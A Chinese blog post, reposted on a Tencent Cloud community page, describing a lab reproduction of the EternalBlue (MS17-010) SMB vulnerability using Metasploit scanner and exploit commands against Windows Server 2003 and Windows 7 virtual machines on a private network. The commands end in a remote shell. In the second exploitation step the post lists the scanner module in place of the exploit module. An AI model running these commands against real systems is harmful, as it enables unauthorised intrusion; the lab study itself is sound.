前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >永恒之蓝(MS17010)漏洞复现

永恒之蓝(MS17010)漏洞复现

作者头像
全栈程序员站长
发布2022-08-18 21:23:58
1.6K0
发布2022-08-18 21:23:58
举报

大家好,又见面了,我是你们的朋友全栈君。

文章目录

介绍:

永恒之蓝是指黑客团体Shadow Brokers公布的大批网络攻击工具,其中就包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞来获取系统最高权限。

恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,就可以进行非法操作。

准备

1.kali的ip:192.168.0.128

在这里插入图片描述
在这里插入图片描述

2.WindowsServer2003的ip:192.168.0.200

在这里插入图片描述
在这里插入图片描述

3.测试连通性:

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

开始复现

1.kali进入msf。 命令:msfconsole

在这里插入图片描述
在这里插入图片描述

2.search ms17-010 #搜索ms17010

在这里插入图片描述
在这里插入图片描述
  • use auxiliary/scanner/smb/smb_ms17_010 #使用模块
  • show options #显示选项
在这里插入图片描述
在这里插入图片描述
  • set RHOSTS 192.168.0.200 # 设置目标主机
在这里插入图片描述
在这里插入图片描述
  • 输入run或者exploit执行
  • 发现存在漏洞
在这里插入图片描述
在这里插入图片描述

3.通过使用exploit/windows/smb/ms17_010_eternalblue模块进行漏洞攻击

  • use exploit/windows/smb/ms17_010_eternalblue
  • set rhosts 192.168.0.200 #设置被攻击端IP
  • run #执行
在这里插入图片描述
在这里插入图片描述

发现这个exp只能对64位的系统执行攻击。惨兮兮!! 哎,重来吧。 win7ip:192.168.0.129

在这里插入图片描述
在这里插入图片描述

测试连通也没问题

正式开始利用

  1. use auxiliary/scanner/smb/smb_ms17_010 # 使用模块 set rhosts 192.168.0.129 #设置目标IP run
在这里插入图片描述
在这里插入图片描述

发现存在漏洞。 2.漏洞利用

  • use auxiliary/scanner/smb/smb_ms17_010
  • set rhosts 192.168.0.129
  • run
在这里插入图片描述
在这里插入图片描述

发现攻击成功。 然后就可以为所欲为了。

在这里插入图片描述
在这里插入图片描述

发现有乱码,可以使用chcp 65001命令消除乱码。

在这里插入图片描述
在这里插入图片描述

至此复现结束。

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/135847.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年5月3,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 文章目录
  • 介绍:
  • 准备
  • 开始复现
    • 正式开始利用
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档